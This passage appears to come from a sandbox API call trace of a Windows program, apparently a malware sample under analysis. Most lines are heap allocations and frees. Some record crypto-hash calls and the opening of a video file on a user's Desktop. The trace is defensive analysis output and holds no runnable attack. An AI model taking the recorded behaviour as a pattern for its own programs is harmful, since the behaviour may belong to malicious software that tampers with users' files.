hHeap=0x8a0000) returned 1 [0168.191] GetProcAddress (hModule=0x74f20000, lpProcName="CryptDestroyHash") returned 0x74f2df66 [0168.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0168.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0168.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0168.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0168.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0168.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0168.191] CryptDestroyHash (hHash=0x90af58) returned 1 [0168.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0168.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0168.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0168.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0168.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0168.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0168.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0168.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0168.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0168.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0168.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0168.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0168.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0168.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0168.192] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0168.192] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0168.192] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0168.192] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0168.192] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0168.192] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0168.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0168.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0168.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0168.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0168.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0168.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0168.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0168.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0168.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0168.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0168.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0168.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0168.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0168.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0168.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0168.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0168.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0168.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0168.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0168.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0168.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0168.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0168.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0168.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0168.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0168.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0168.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0168.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0168.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0168.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0168.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0168.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0168.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0168.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0168.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0168.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0168.195] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0168.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0168.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0168.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0168.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0168.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0168.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0168.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0168.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0168.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0168.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0168.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0168.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0168.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0168.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0168.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0168.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0168.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0168.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0168.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0168.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0168.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0168.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0168.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0168.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0168.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0168.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0168.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0168.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0168.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0168.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0168.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0168.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc168 | out: hHeap=0x8a0000) returned 1 [0168.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0168.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0168.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0168.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0168.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0168.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0168.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0168.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0168.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0168.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0168.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0168.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0168.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0168.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0168.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0168.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0168.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0168.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0168.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0168.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0168.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0168.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0168.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0168.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0168.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df190 | out: hHeap=0x8a0000) returned 1 [0168.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0168.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0168.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0168.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0168.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0168.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0168.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0168.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0168.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0168.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0168.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0168.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0168.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0168.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0168.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0168.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0168.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0168.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0168.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0168.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0168.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0168.198] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0168.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0168.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0168.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0168.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0168.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0168.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0168.198] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0168.198] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae58 | out: hHeap=0x8a0000) returned 1 [0168.198] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0168.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0168.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0168.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0168.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0168.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0168.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0168.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0168.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0168.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae58 [0168.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0x9c5180 [0168.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0168.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0168.200] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wE2eF3.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\we2ef3.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0168.200] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.200] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0168.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0168.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0168.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0168.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0168.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0168.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0168.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0168.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0168.200] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0168.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0168.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0168.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0168.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0168.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0168.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0168.200] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0168.200] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0168.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0168.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0168.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0168.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0168.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0168.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0168.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0168.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0168.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0168.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0168.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0168.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0168.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0168.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0168.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0168.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0168.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0168.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0168.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0168.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0168.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0168.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0168.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0168.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0168.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0168.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0168.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0168.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0168.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0168.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923b28 [0168.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0168.202] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923ad0 [0168.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 